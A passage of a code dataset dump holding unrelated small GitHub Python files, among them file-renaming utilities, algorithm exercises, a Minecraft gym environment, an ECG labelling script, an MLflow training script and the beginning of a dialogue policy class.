name='excluir-atividade')\n]","repo_name":"nicolasrezende/lms-identidade-visual","sub_path":"lms/restrito/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71390036325","text":"import os\nimport sys\nimport shutil\nimport string\nimport re\n\npy = '.py'\ngo = '.go'\ndef file_name(file_dir):\n\n for root, dirs, files in os.walk(file_dir):\n if (os.path.dirname(root)== file_dir or os.path.dirname(os.path.dirname(root))== file_dir) and not root.isdigit():\n for i in files:\n if i =='process.py' or i in dirs:\n continue\n if i.endswith(py) :\n str = i.strip(py)\n if str not in dirs:\n filedir = root + \"\\\\\" + str\n os.makedirs(filedir)\n oldpath = root + \"\\\\\" + i\n newpath = root+\"\\\\\"+str+\"\\\\\"+i\n print(oldpath,newpath)\n shutil.move(oldpath,newpath)\n if i.endswith(go) :\n str = i.strip(go)\n if str not in dirs:\n filedir = root + \"\\\\\" + str\n os.makedirs(filedir)\n oldpath = root + \"\\\\\" + i\n newpath = root + \"\\\\\" + str + \"\\\\\" + i\n print(oldpath, newpath)\n shutil.move(oldpath,newpath)\n\n\n\n\npath = sys.path[0]\nprint(path)\nfile_name(path)\ngopath = sys.path[0]+\"\\\\Golang\"\npypath = sys.path[0]+\"\\\\Python\"","repo_name":"AllanZheng/Leetcode","sub_path":"process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73624232484","text":"#无文件夹\nimport os\nimport shutil\ndef rename(Path):\n\tpath=Path\n\tfilelist=os.listdir(path)#该文件夹下所有的文件(包括文件夹)\n\tfilelist=sorted(filelist)\n\tprint (filelist)\n\tprint('-'*80)\n\n\tloadnum = 1\n\tfor files in filelist[::-1]:#遍历所有文件\n\t\tOlddir=os.path.join(path,files)#原来的文件路径\n\t\tif os.path.isdir(Olddir):#如果是文件夹则跳过\n\t\t\tcontinue\n\t\tfilename=os.path.splitext(files)[0]#文件名\n\t\tfiletype=os.path.splitext(files)[1]#文件扩展名\n\t\tchange=str(int(filename[-4:])+250)\n\t\tnewfilename=filename.replace(filename[-4:],change)\n\t\tNewdir=os.path.join(path,newfilename+filetype)#新的文件路径\n\t\tos.rename(Olddir,Newdir)#重命名\n\t\tprint ('[' + str(loadnum) + ' / 59]')\n\t\tloadnum += 1\n\tprint('rename success !!')\nif __name__ == '__main__':\n\tpath=\"\\\\\\\\192.168.2.230\\\\Main\\\\Project2016\\\\TMZ\\\\Shots\\\\TMZ_001_004\\\\TMZ_001_004_0010\\\\Minicomp\\\\TMZ_001_004_0010_Minicomp_v280\\\\footage\\\\TMZ_001_004_0010_LAYER0\"\n\trename(path)\n","repo_name":"CedricMx/Tools","sub_path":"file_changename/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"626644859","text":"#Uses python3\n\n\ndef getMax(myList):\n max = None\n for i in range(len(myList)):\n if max is None or myList[i] > max:\n max = myList[i]\n\n return max\n\n\ndef max_dot_product(a, b):\n res = 0\n for i in range(len(a)):\n # For each list find the maximums and iterate for all elements\n maxValueA = getMax(a)\n a.remove(maxValueA)\n maxValueB = getMax(b)\n b.remove(maxValueB)\n res += maxValueA * maxValueB # Add maximum product to the result\n return res\n\n\nif __name__ == '__main__':\n numbers = input()\n firstSeq = [int(x) for x in input().split()]\n secondSeq = [int(x) for x in input().split()]\n print(max_dot_product(firstSeq, secondSeq))","repo_name":"OnerInce/coursera-projects","sub_path":"greedy-solutions/python-max_revenue/max_revenue.py","file_name":"max_revenue.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"44218129830","text":"def sentidoPercurso(p1,p2,p3):\n a = p2[0] - p1[0]\n b = p3[1] - p1[1]\n c = p3[0] - p1[0]\n d = p2[1] - p1[1]\n a = (a*b)-(c*d)\n if (a > 0):\n return 1\n elif (a < 0):\n return -1\n else:\n return 0\n\ndef intercepta(s1,s2):\n x1, y1 = s1[0]\n x2, y2 = s1[1]\n x3, y3 = s2[0]\n x4, y4 = s2[1]\n if (max(x1, x2) >= min(x3, x4) and\n max(x3, x4) >= min(x1, x2) and\n max(y1, y2) >= min(y3, y4) and\n max(y3, y4) >= min(y1, y2) and\n sentidoPercurso(s1[0], s1[1], s2[0]) * sentidoPercurso(s1[0], s1[1], s2[1]) <= 0 and\n sentidoPercurso(s2[0], s2[1], s1[0]) * sentidoPercurso(s2[0], s2[1], s1[1]) <= 0):\n return 1\n else:\n return 0\n\ndef pontoNoSegmento(p1,p2,p3):\n resultado = (sentidoPercurso(p1,p2,p3) == 0) and (p1[0] >= min(p2[0], p3[0])) and (p1[0] <= max(p2[0], p3[0])) and (p1[1] >= min(p2[1], p3[1])) and (p1[1] <= max(p2[1], p3[1]))\n return resultado\n\ndef pontoInterior(poligono,n,q):\n maxx = poligono[0][0]\n s1 = [[0,0],[0,0]]\n s2 = [[0,0],[0,0]]\n poligono[n] = poligono[0]\n\n for i in range(1,n+1):\n if(pontoNoSegmento(q,poligono[i-1],poligono[i])):\n return 5\n if(poligono[i][0] > maxx):\n maxx = poligono[i][0]\n\n s2[0] = q\n s2[1][0] = maxx+1\n s2[1][1] = q[1]\n cont = 0\n \n for i in range(1,n+1):\n s1[0] = poligono[i-1]\n s1[1] = poligono[i]\n if ((((poligono[i][1] > q[1]) and (poligono[i-1][1] <= q[1])) or ((poligono[i-1][1] > q[1]) and (poligono[i][1] <= q[1]))) and (intercepta(s1,s2))):\n cont += 1 \n return cont%2\n\ndef saida(interior):\n if(interior == 5):\n return '/'\n elif(interior == 1):\n return '!'\n else:\n return '-'\n\ndef interfaceGrafica():\n nCasos = int(input())\n while(nCasos > 0):\n n = int(input())\n pontosPoligono = input().split(\" \")\n c = int(input())\n pontosClique = input().split(\" \")\n poligono = [0]*((2*n)+1)\n cliques = [0]*((2*c)+1)\n\n for i in range(2*n):\n poligono[i] = int(pontosPoligono[i])\n \n for i in range(2*c):\n cliques[i] = int(pontosClique[i])\n \n for i in range(n):\n poligono[i:i+2] = [poligono[i:i+2]]\n\n for i in range(c):\n cliques[i:i+2] = [cliques[i:i+2]]\n\n output = ''\n for i in range(c):\n interior = pontoInterior(poligono,n,cliques[i])\n output += saida(interior)\n\n print(output)\n nCasos -= 1\n\ninterfaceGrafica()","repo_name":"mercietc/Algorithms-Development-and-Implementation---Beecrowd-Challenges","sub_path":"Semana14-Geometria-Discreta-I/interfaceGrafica.py","file_name":"interfaceGrafica.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"17261580562","text":"import sys\nsys.stdin = open(\"input.txt\")\n\nT = int(input())\n\n\nfor tc in range(1, T+1):\n n, m = map(int, input().split())\n li = list(map(int, input().split()))\n # 인덱스번호와 치즈양만큼 리스트로 묶음\n pizza = [[i+1, v] for i, v in enumerate(li)]\n # 오븐에는 n개의 피자만 들어간다\n oven = pizza[:n]\n # 오븐에 들어가지 못한 피자\n pizza = pizza[n:]\n # 오븐에 마지막으로 피자가 1개만 남았을때까지\n while len(oven) != 1:\n # 꺼내는 피자\n check_pizza = oven.pop(0)\n # 치즈의 양은 전보다 줄었다.\n check_pizza[1] //= 2\n # 만약 치즈가 다 녹았다?\n if check_pizza[1]==0:\n # 그리고 오븐에 들어가지 못한피자가 있다?\n if pizza:\n # 그럼 오븐에 넣는다.\n oven.append(pizza.pop(0))\n # 치즈가 안녹았다?\n else:\n # 다시 오븐에 집어 넣어\n oven.append(check_pizza)\n\n print(\"#{} {}\".format(tc, oven[0][0]))\n\n","repo_name":"Gwanghun-Im/algorithm_study","sub_path":"5099_피자굽기/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"28552834130","text":"import math\n\ndef ejercico01():\n print(\"hola\")\n\n num=[None]*12 #definir vector\n\n #Asignando valores\n num[0]=39\n num[1]=-2\n num[4]=0\n num[6]=14\n num[8]=5\n num[9]=120\n numx=[39,-2,None,None, 0,None,14,None,5,120,None,None]\n #Imprimir vector\n print(num)\n print(numx)\n\ndef ejercio02():\n num1=int(input(\"Ingrese el Primer numero:\"))\n num2=int(input(\"Ingrese el Segundo numero:\"))\n c=num1/num2\n print(\"Cociente:\", c)\n r=num1%num2\n print(\"Resto:\", r)\n\ndef ejercicio31():\n #definir variables\n nota:float()\n categoria:str()\n #Leer datos\n nota=float(input(\"Ingrese Nota Promedio:\"))\n #proceso\n if nota>=0 and nota<=5:\n categoria=\"Pesimo\"\n elif nota>=6 and nota<=10:\n categoria=\"Malo\"\n elif nota>=11 and nota<=14:\n categoria=\"Regular\"\n elif nota>=15 and nota<=16:\n categoria=\"Bueno\"\n elif nota>=17 and nota<=20:\n categoria=\"Excelente\"\n else:\n categoria=\"Nota no valida\"\n #Datos de salida\n print(categoria)\n\ndef ejercicio08():\n #Definir variables\n capital:float()\n ti:float()\n ic:float()\n tiempo:int()\n #Datos de entrada\n capital=float(input(\"Ingrese el Capital:\"))\n ti=float(input(\"Ingrese tasa de interes:\"))\n tiempo=int(input(\"Tiempo de inversion:\"))\n #Proceso\n ic=((math.pow((1+ti),tiempo))*capital) - capital\n #Datos de salida\n print(\"Intere Compuesto:\", ic)\n#ejercio02()\n#ejercicio31()\n\ndef propuesto50():\n #definir variables\n numFin:int() \n #Datos de entrada\n numFin=int(input(\"Ingrese el rango Final:\"))\n #proceso\n if(numFin>=10):\n for i in range(numFin): \n valorI=str(i)[::-1]; \n if i>=10 and i==int(valorI):\n print(i)\n\n \n #datos de salida\ndef propuesto43():\n numA=int(input(\"Ingrese el num A:\"))\n numB=int(input(\"Ingrese el num B:\"))\n numPar, numImpar, numMult3=0,0,0 \n sumPar, sumImpar, sumMult3=0,0,0\n for i in range(numA,numB+1):\n if i%2==0:\n numPar=numPar+1\n sumPar=sumPar+i\n else:\n numImpar=numImpar+1\n sumImpar=sumImpar+i\n if(i%3==0):\n numMult3=numMult3+1\n sumMult3=sumMult3+i\n print(\"Cant num Par:\", numPar)\n print(\"Cant num Impar:\", numImpar)\n print(\"Cant num Multiplo 3:\", numMult3)\n print(\"Suma num Par:\", sumPar)\n print(\"Suma num Impar:\", sumImpar)\n print(\"Suma num Multiplo 3:\", sumMult3) \n\n#ejercicio08()\n#propuesto50()\npropuesto43()\n\n\n\n\n","repo_name":"davidmp/ReforzamientoFP2022","sub_path":"ReforzamientoPython/Ejercicios.py","file_name":"Ejercicios.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13436403249","text":"class Solution:\n def dailyTemperatures(self, temperatures: List[int]) -> List[int]:\n # Monotonic stack problem\n stack = []\n days = [0] * len(temperatures)\n \n for i, temp in enumerate(temperatures):\n while len(stack) > 0 and temp > stack[-1][0]:\n _, p_i = stack.pop()\n days[p_i] = i - p_i\n stack.append((temp, i))\n \n return days\n","repo_name":"wpine215/dsa-practice","sub_path":"stack/daily_temperatures.py","file_name":"daily_temperatures.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8509789385","text":"'''\nmethod to read stored credentials from a file to connect to the mongo database.\n'''\n\n\ndef read_credential(file_name=None):\n\n\twith open(file_name, \"r\") as _file:\n\t\t_lines = _file.readlines()\n\t\t_file.close()\n\t\tuser_name = _lines[0].strip().split()[1]\n\t\tpwd = _lines[1].strip().split()[1]\n\t\turl = _lines[2].strip().split()[1]\n\t\treturn user_name, pwd, url\n\n","repo_name":"SiddharthaAnand/dblp-spider","sub_path":"coauthornetwork/read_credential.py","file_name":"read_credential.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"29975736527","text":"import gym\nimport math\nimport os, time\nfrom gym import error, spaces, utils, logger\nfrom gym.utils import seeding\nimport numpy as np\nfrom PIL import Image\n\nclass MinecraftLiveEnv(gym.Env):\n \"\"\"\n Description:\n Vanilla Minecraft Java Edition - This gym was designed to work tightly with Minecraft as players would play it, unlike tools such as project Malmo \n that rely on plugins to interact with the environment. With MinecraftLive, the agent is exposed to the Minecraft environment by sending keyboard and \n mouse emulations to the environment and capturing/processing a screenshot as part of the observation process.\n\n Currently integrates with the MindcraftMind project, a tool designed to interact with the Minecraft client without the use of plugins. \n TODO: Adapt the environment to be configurable to be used with other agents, such as Malmo.\n Source:\n Project Malmo and others involving the applications of RL to Minecraft\n Observation: \n Type: Agent analyzes the image and captures health, food, brightness data. \n Actions:\n Type: Commands to send to the Minecraft client via the agent (currently MindcraftMind)\n \n Note: More than one command can be issued at a time - for example: Holding shift while moving to move with stealth. This action (moving stealthily) \n must be learned by the agent as opposed to being an option to select from.\n Reward:\n Reward is 1 for every step taken, including the termination step\n Starting State:\n All observations are assigned a uniform random value in [-0.05..0.05]\n Episode Termination:\n The agent dies and is presented with the death screen.\n\n Solved Requirements\n High score on hard mode\n \"\"\"\n\n metadata = {\n 'render.modes': ['human'],\n 'video.frames_per_second': 120\n }\n \n def __init__(self, agent, screenshot_path):\n self.agent = agent\n self.screenshot_path = screenshot_path \n self.action_space = spaces.MultiDiscrete(self.agent.action_spaces)\n self.observation_space = None\n self.seed()\n self.viewer = None\n self.state = None\n self.steps_beyond_done = None\n self.screenshot_history = None\n\n\n def set_agent(self, agent):\n self.agent = agent\n\n\n def get_agent(self):\n return self.agent\n\n\n def set_screenshot_history_path(self, history):\n self.screenshot_history = history\n\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n\n def step(self, action):\n assert self.screenshot_path != None, \"%r (%s) invalid. Be sure to set the location of where the Minecraft client stores screenshots by calling `set_screenshot_paths` when initializing.\"\n assert self.screenshot_history != None, \"%r (%s) invalid. Be sure to set the location of where the environment stores screenshot history by calling `set_screenshot_paths` when initializing.\"\n state = self.state\n \n threads = []\n for index, action_item in enumerate(action):\n action_thread = self.agent.perform_action(self.agent.actions[index][action_item])\n threads.append(action_thread)\n \n #for thread in threads:\n # thread.join()\n \n self.get_state()\n done = self.agent.is_dead(self.state)\n \n reward = 0\n if not done:\n reward = reward + 1\n elif self.steps_beyond_done is None:\n # Agent just died!\n self.steps_beyond_done = 0\n reward = 1\n else:\n if self.steps_beyond_done == 0:\n logger.warn(\"You are calling 'step()' even though this environment has already returned done = True. You should always call 'reset()' once you receive 'done = True' -- any further steps are undefined behavior.\")\n self.steps_beyond_done += 1\n reward = 0.0\n\n return self.state, reward, done, {}\n\n\n def render(self, mode='human'):\n if self.viewer is None:\n from gym.envs.classic_control import rendering\n self.viewer = rendering.SimpleImageViewer(maxwidth=self.agent.resolution[0])\n if self.state is None:\n state = np.array(Image.new('RGBA',(self.agent.resolution[0],self.agent.resolution[1]), (255, 255, 255, 255)))\n else:\n im = None\n wait_count = 0\n while im is None:\n try:\n im = Image.open(self.state)\n except:\n time.sleep(0.01)\n wait_count = wait_count + 1\n if(wait_count > 100):\n break\n state = np.array(im) \n return state\n \n\n def get_state(self):\n self.agent.look()\n files = os.listdir(self.screenshot_path) #images = self.poll_for_screenshot(self.screenshot_path)\n if(len(files) > 0):\n files.sort(reverse=True)\n self.state = os.path.join(self.screenshot_path, files[0])\n return self.state \n\n\n def reset(self):\n self.steps_beyond_done = None \n if(self.state is not None):\n self.agent.respawn()\n return self.get_state()\n\n","repo_name":"dfredriksen/gym_MinecraftLive","sub_path":"gym_MinecraftLive/envs/MinecraftLive_env.py","file_name":"MinecraftLive_env.py","file_ext":"py","file_size_in_byte":4845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10362083127","text":"# coding=utf-8\nfrom PIL import Image, ImageTk\nimport tkinter as tk\nfrom page import course, exercise\n\nclass MainPage():\n\n def __init__(self, goCoursePage, goExercisePage):\n self.goCoursePage = goCoursePage\n self.goExercisePage = goExercisePage\n\n self.root = tk.Tk()\n self.root.title(\"仓颉学习器\")\n self.root.geometry(\"600x600\")\n self.root.configure(background='white')\n self.root.resizable(False, False)\n\n self.pixel = tk.PhotoImage(width=1, height=1)\n\n self.frameLeft = tk.Frame(width=100, height=600, bg=\"white\")\n self.frameCenter1 = tk.Frame(width=400, height=100, bg=\"white\")\n self.frameCenter2 = tk.Frame(width=400, height=100, bg=\"white\")\n self.frameCenter3 = tk.Frame(width=400, height=100, bg=\"white\")\n self.frameCenter4 = tk.Frame(width=400, height=100, bg=\"white\")\n self.frameCenter5 = tk.Frame(width=400, height=200, bg=\"white\")\n self.frameRight = tk.Frame(width=100, height=600, bg=\"white\")\n\n tk.Button(self.frameCenter2, text=\"倉頡教學\", width=\"400\", height=\"100\", font=('microsoft yahei', '30', 'bold'), image=self.pixel,\n compound=\"center\", command=self.goCoursePage).grid(row=0)\n tk.Button(self.frameCenter4, text=\"倉頡拆碼練習\", width=\"400\", height=\"100\", font=('microsoft yahei', '30', 'bold'), image=self.pixel,\n compound=\"center\", command=self.goExercisePage).grid(row=0)\n\n self.frameLeft.grid(row=0, column=0, rowspan=5)\n self.frameCenter1.grid(row=0, column=1, sticky=\"n\")\n self.frameCenter2.grid(row=1, column=1, sticky=\"n\")\n self.frameCenter3.grid(row=2, column=1, sticky=\"n\")\n self.frameCenter4.grid(row=3, column=1, sticky=\"n\")\n self.frameCenter5.grid(row=4, column=1, sticky=\"n\")\n self.frameRight.grid(row=0, column=2, rowspan=5)\n\n self.frameLeft.grid_propagate(0)\n self.frameCenter1.grid_propagate(0)\n self.frameCenter2.grid_propagate(0)\n self.frameCenter3.grid_propagate(0)\n self.frameCenter4.grid_propagate(0)\n self.frameCenter5.grid_propagate(0)\n self.frameRight.grid_propagate(0)\n\n self.root.mainloop()\n\nif __name__ == '__main__':\n root = tk.Tk()\n MainPage()\n root.mainloop()\n\n\n","repo_name":"jamesmok102/CangjieLearner","sub_path":"page/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44037060544","text":"#!/usr/bin/python3 \n\n#animals.py\n\nInFileName = \"animals.csv\"\nInFile = open(InFileName, 'r')\n\nOutFileName = \"new_animals.csv\"\nOutFile = open(OutFileName, 'w')\n\nLineNumber = 0\n\nfor line in InFile:\n if LineNumber > 0:\n line = line.strip('\\n')\n List = line.split(',')\n print(List[1] + \"\\t\" + List[0])\n OutputString = (List[1] + \"\\t\" + List[0])\n OutFile.write(str(OutputString))\n LineNumber = LineNumber + 1\n\nInFile.close()\nOutFile.close()\n\n","repo_name":"rkyger-git/BIOL792-1044_Bioinformatics_and_Data_Science","sub_path":"animals.py","file_name":"animals.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17743362430","text":"\"\"\"\nTakes the raw inputs and transforms them to an array.\n\"\"\"\nimport argparse\nimport base64\nimport binascii\nimport codecs\nimport json\nimport numpy as np\nimport os\nimport shutil\nimport struct\n\n#import matplotlib.pyplot as plt\n\n#%matplotlib inline\n\ndef contains(str1, str2):\n index_start = str1.find(str2)\n index_end = index_start + len(str2) -1\n if index_start < 0:\n return 0\n \n if index_start-1 >= 0:\n if str1[index_start-1] != \",\":\n return 0\n \n if index_end + 1 < len(str1):\n if str1[index_end + 1] != \",\":\n return 0\n return 1\n\ndef process(directory, objects_name_group, objects_name_exclude_group, output_dir, verbose):\n \"\"\"\n Goes through all the files\n \"\"\"\n files_name = os.listdir(directory)\n Y = np.zeros(len(files_name))\n out_was_modified = np.zeros(len(files_name))\n out_file_name = []\n print(len(files_name))\n for j in range(len(files_name)):\n file_name = directory+\"/\"+files_name[j] \n data = json.load(open(file_name))\n \n \n ds = data['RestingECG']['Diagnosis']['CategoriesDiagnosis']\n try:\n # AND\n for i in range(len(objects_name_group)):\n flag = 1\n objects_name = objects_name_group[i]\n objects_name_exclude = objects_name_exclude_group[i]\n for and_object_name in objects_name:\n # OR\n or_flag = 0\n for object_name in and_object_name:\n if or_flag == 0:\n or_flag = contains(ds, object_name)\n else:\n break\n if or_flag == 0:\n flag = 0\n break\n # Exclude\n for object_name_exclude in objects_name_exclude:\n if flag == 1:\n flag = abs(1 - contains(ds, object_name_exclude))\n else:\n break\n if flag == 1:\n Y[j] = i + 1\n break\n except:\n \"ERROR\"\n pass\n if verbose:\n print(Y[j])\n was_modified = 0\n if data['RestingECG']['Diagnosis']['CategoriesDiagnosis'] != data['RestingECG']['Diagnosis']['CategoriesOriginal']:\n was_modified = 1\n \n out_was_modified[j] = was_modified\n out_file_name.append(files_name[j])\n\n\n np.savetxt(output_dir+'/was_modified.txt', out_was_modified, fmt='%d')\n np.savetxt(output_dir+'/Y.txt', Y, fmt='%d')\n\n with open(output_dir+'/file_name.json', 'w') as f:\n f.write(json.dumps(files_name))\n\ndef main():\n \"\"\"\n -v:\n directory: the directory of the raw input data\n lead: 0 is for shorter one, 1 for longer one\n \"\"\"\n parser = argparse.ArgumentParser(description='Flags')\n parser.add_argument('-v', dest='verbose', action='store_true')\n parser.add_argument('directory')\n parser.add_argument('disease')\n args = parser.parse_args()\n\n PERI = [['200']]\n PERI_IGNORE = ['302,200','145,302,155,200,220']\n\n STE = [['330,160','330,161', '330,162', '330,163', '330,165', '330,166', '330,174']]\n STE_IGNORE = ['312,330']\n\n # [0] = SVT, [1] = with Aberrancy\n SVT = [['21','50,346','51,346','52','53','55'], ['86','100','101','102','104','105','106','349']]\n SVT_IGNORE = []\n\n VT = [['70','72','73']]\n VT_IGNORE = []\n\n data = []\n data_ignore = []\n other_objects = []\n output_dir = \"\"\n\n if args.disease == \"ps\":\n data = [PERI, STE]\n data_ignore = [PERI_IGNORE, STE_IGNORE]\n other_objects = STE\n output_dir = \"out_PS\"\n elif args.disease == \"vts\":\n data = [VT, SVT]\n data_ignore = [VT_IGNORE, SVT_IGNORE]\n other_objects = PERI\n output_dir = \"out_VTSVT\"\n else:\n return\n\n # Clear folder if exists\n if os.path.exists(output_dir):\n shutil.rmtree(output_dir)\n os.makedirs(output_dir)\n\n # Add to folder\n process(args.directory, data, data_ignore, output_dir, args.verbose)\n\nmain()","repo_name":"KevinAyuque/EKG-Project","sub_path":"data_Y.py","file_name":"data_Y.py","file_ext":"py","file_size_in_byte":4164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30337242934","text":"import warnings\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score\nimport mlflow\nimport mlflow.sklearn\n\nTHRESHOLD = 0.5\nTEST_SIZE = 0.3\nDATA_RANDOM_STATE = 0 \n\ndef main():\n\n warnings.simplefilter(action='ignore', category=FutureWarning)\n warnings.simplefilter(action='ignore', category=UserWarning)\n warnings.simplefilter(action='ignore', category=RuntimeWarning)\n\n # Load the csv dataset \n df = pd.read_csv(\"../data-layer/data/training/data.csv\")\n\n # Independent and Dependent features\n X=df.iloc[:,:-1]\n y=df.iloc[:,-1]\n\n # Train test split \n X_train,X_test,y_train,y_test=train_test_split(X, y, test_size=TEST_SIZE, random_state=DATA_RANDOM_STATE)\n\n mlflow.set_experiment(\"Experimentation\")\n mlflow.sklearn.autolog()\n with mlflow.start_run(run_name=\"train_model_lr\", nested=True) as run:\n mlflow.set_tag(\"mlflow.runName\", \"train_model_lr\")\n\n # Initializing classifier with the best params \n lr = LogisticRegression(penalty='l2', C=1e-5, class_weight=None)\n\n # Model training \n lr.fit(X_train, y_train)\n\n # Prediction \n y_probas = lr.predict(X_test)\n y_preds = [1 if y_proba > THRESHOLD else 0 for y_proba in y_probas]\n\n # Evaluation \n accuracy = accuracy_score(y_test, y_preds)\n precision = precision_score(y_test, y_preds)\n recall = recall_score(y_test, y_preds)\n f1 = f1_score(y_test, y_preds)\n \n print('Final Testing RESULTS')\n print('/-------------------------------------------------------------------------------------------------------- /')\n print('Accuracy is ', accuracy)\n print('Precision is ', precision)\n print('Recall is ', recall)\n print('F1-Score is ', f1)\n print('/-------------------------------------------------------------------------------------------------------- /')\n\n # Saving parameters, metrics, and model\n mlflow.log_metric(\"test_accuracy\", accuracy)\n mlflow.log_metric(\"precision\", precision)\n mlflow.log_metric(\"recall\", recall)\n mlflow.log_metric(\"f1-score\", f1)\n\nif __name__== \"__main__\":\n\tmain()","repo_name":"jackma-00/thesis-mlops-platform-poc","sub_path":"experimentation/reproducibility-tests/lr_train.py","file_name":"lr_train.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35078946286","text":"'''\nbsctools - a single cell bacteria transcripton analysis pipeline\n====================================================================\n\n:Author: \n:Release: bioinplant\n:Date: 2022.09.15\n:Tags: Bacteria SCRNA-seq analysis pipeline\n\nThere are 3 tools:\n\n - inanno This tools based on kraken2 to do species identification\n - pandb Dataset of bacteria pangenome in genus level\n - pang Pan-genome test\n\nTo get help on a specific tool, type:\n\n\tbsctools --help\n\nTo use a specific tools, type:\n\n\tbsctools [tools options] [tool argument]\n'''\n\nfrom __future__ import absolute_import\nimport os\nimport sys\nimport importlib\nfrom bsctools import __version__\n\ndef main(argv = None):\n\n argv = sys.argv\n\n path = os.path.abspath(os.path.dirname(__file__))\n\n if len(argv) == 1 or argv[1] == \"--help\" or argv[1] == \"-h\":\n print(globals()[\"__doc__\"])\n\n return\n\n elif len(argv) ==1 or argv[1] == \"--version\" or argv[1] == \"-v\":\n print(\"bsctools version: %s\" % __version__)\n\n return\n\n elif argv[2] in [\"--help\", \"-h\", \"--help-extended\"]:\n print(\"bsctools: Version %s\" % __version__)\n\n command = argv[1]\n\n module = importlib.import_module(\"bsctools.\" + command, \"bsctools\")\n ##remove 'bsctools' from sys.argv\n del sys.argv[0]\n module.main(sys.argv)\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"GibbsQian/SCBacteria_species_identification","sub_path":"bsctools/bsctools.py","file_name":"bsctools.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5621584897","text":"# -*- coding: utf-8 -*-\nimport time\nfrom functools import wraps\n\n\ndef getRunningTime(func):\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n start = time.time()\n try:\n return func(*args, **kwargs)\n finally:\n end = time.time()\n print(end - start)\n return wrapper\n\n\n@getRunningTime\ndef solution(n, _open, close, bracket, result):\n if close == n:\n result.append(bracket)\n return\n\n # 열고\n if _open < n:\n solution(n, _open + 1, close, bracket + \"(\", result)\n\n # 닫고\n if close < _open:\n solution(n, _open, close + 1, bracket + \")\", result)\n\n\n# main\nif __name__ == \"__main__\":\n # 시간 체크\n n = 4\n\n result = list()\n solution(n, 0, 0, \"\", result)\n print(len(result))\n","repo_name":"bluemiv/Algorithm","sub_path":"mailprogramming/python/exam05.py","file_name":"exam05.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39939969877","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport random\nimport itertools\n\nfrom alex.components.dm import DialoguePolicy\nfrom alex.components.slu.da import DialogueAct, DialogueActItem\nfrom alex.applications.utils.weather import OpenWeatherMapWeatherFinder\n# from alex.components.slu.da import DialogueActConfusionNetwork\n# from alex.components.asr.utterance import Utterance, UtteranceNBList, UtteranceConfusionNetwork\n\nfrom datetime import timedelta\nfrom .directions import GoogleDirectionsFinder, Travel, NotSupported\nfrom .platform_info import PlatformInfo\nfrom datetime import datetime\nfrom datetime import time as dttime\nfrom collections import defaultdict\nimport re\n\n\ndef randbool(n):\n \"\"\"Randomly return True in 1 out of n cases.\n\n :param n: Inverted chance of returning True\n :rtype: Boolean\n \"\"\"\n if random.randint(1, n) == 1:\n return True\n return False\n\n\nclass PTICSHDCPolicy(DialoguePolicy):\n \"\"\"The handcrafted policy for the PTI-CS system.\"\"\"\n\n def __init__(self, cfg, ontology):\n super(PTICSHDCPolicy, self).__init__(cfg, ontology)\n\n directions_type = GoogleDirectionsFinder\n if 'directions' in cfg['DM'] and 'type' in cfg['DM']['directions']:\n directions_type = cfg['DM']['directions']['type']\n self.directions = directions_type(cfg=cfg)\n self.weather = OpenWeatherMapWeatherFinder(cfg=cfg)\n self.infer_default_stops = directions_type == GoogleDirectionsFinder\n\n self.system_das = []\n self.last_system_dialogue_act = None\n\n self.debug = cfg.getpath('DM/basic/debug', False)\n self.system_logger = cfg['Logging']['system_logger']\n self.policy_cfg = self.cfg['DM']['dialogue_policy']['PTICSHDCPolicy']\n self.accept_prob = self.policy_cfg['accept_prob']\n\n def reset_on_change(self, ds, changed_slots):\n \"\"\"Reset slots which depends on changed slots.\n\n :param ds: dialogue state\n :param changed_slots: slots changed in the last turn\n \"\"\"\n for ds_slot in ds:\n if ds_slot in changed_slots:\n # do not reset a slot which just changed\n continue\n\n for changed_slot in changed_slots:\n if 